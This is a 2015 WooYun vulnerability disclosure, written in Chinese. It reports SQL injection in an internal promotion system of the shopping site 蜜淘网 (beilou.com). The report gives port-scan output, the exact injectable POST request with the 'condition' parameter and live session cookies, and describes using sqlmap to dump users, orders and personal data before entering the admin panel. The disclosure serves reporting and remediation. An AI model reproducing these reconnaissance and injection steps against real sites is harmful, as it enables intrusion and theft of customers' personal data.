当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114706

漏洞标题:蜜淘网某站存在sql注入漏洞影响300W+用户数据

相关厂商:蜜淘网

漏洞作者: 堂吉诃德

提交时间:2015-05-18 06:30

修复时间:2015-07-02 06:32

公开时间:2015-07-02 06:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

内部系统存在sql注入漏洞,从而侵入成功,将数十万订单数据, 数百万手机号,姓名,身份证号码泄露

详细说明:

提交数据的时候可以嵌套js代码,完成后刷新页面能够执行

漏洞证明:

先看了下主站感觉没啥大漏洞,
然后扫了下域名得知 beilou.com 是其前生,然后扫描端口
Starting Nmap 6.46 ( http://nmap.org ) at 2015-05-17 22:37 CST
Nmap scan report for beilou.com (182.92.111.61)
Host is up (0.013s latency).
Not shown: 978 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
901/tcp filtered samba-swat
1068/tcp filtered instl_bootc
3128/tcp filtered squid-http
4444/tcp filtered krb524
5666/tcp open nrpe
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6667/tcp filtered irc
8009/tcp open ajp13
8010/tcp open xmpp
8081/tcp open blackice-icecap
8090/tcp open unknown
8100/tcp open xprint-server
8200/tcp open trivnet1
9001/tcp open tor-orport
duang~ duang~ 其中8081是gitlab的地址 然后发现8090和8010竟然不需要认证
如下所示:

52AD9A95-3551-4440-8335-A82D4FDDE7E6.png


这个促销系统做的还挺不错的

BF2D7597-95D0-4ECC-995B-35AED4534926.png


iOS设备的推送系统
一般这种站,可能就不怎么严密估计有sql注入漏洞,果然就有一个
POST /red_packet/list HTTP/1.1
Host: monitor.beilou.com:8010
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://monitor.beilou.com:8010
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://monitor.beilou.com:8010/html/red_packet/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: request_method=GET; _gitlab_session=d14a5da0f1dc414332f62d942b315172; JSESSIONID=8817444C85A594E71289965295F21805
condition=12323
这个condition就是可以注入的,然后上sqlmap跑一下

3C295DC0-4B6C-424F-A14F-2B2F7A837C0E.png


跑出了数据库
然后在跑一些数据吧 : )
database management system users [1]:
[*] 'beilouguest'@'%'

58D41BEA-859C-4E95-AD3F-1FF963E4A18C.png


D2993738-B47E-49A6-A32B-2CE361064BA9.png


用户表

6F554EA0-14A6-42C8-8B60-FD5FB292CE07.png


还有一些订单信息
然后根据信息进入了后台。。。
-------------好了不继续了,不然要被请喝茶了------

修复方案:

原本很难搞到这里的,只要把外面的内部系统做个权限控制,然后sql注入的bug修改掉即可
加强安全意识啊

版权声明:转载请注明来源 堂吉诃德@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)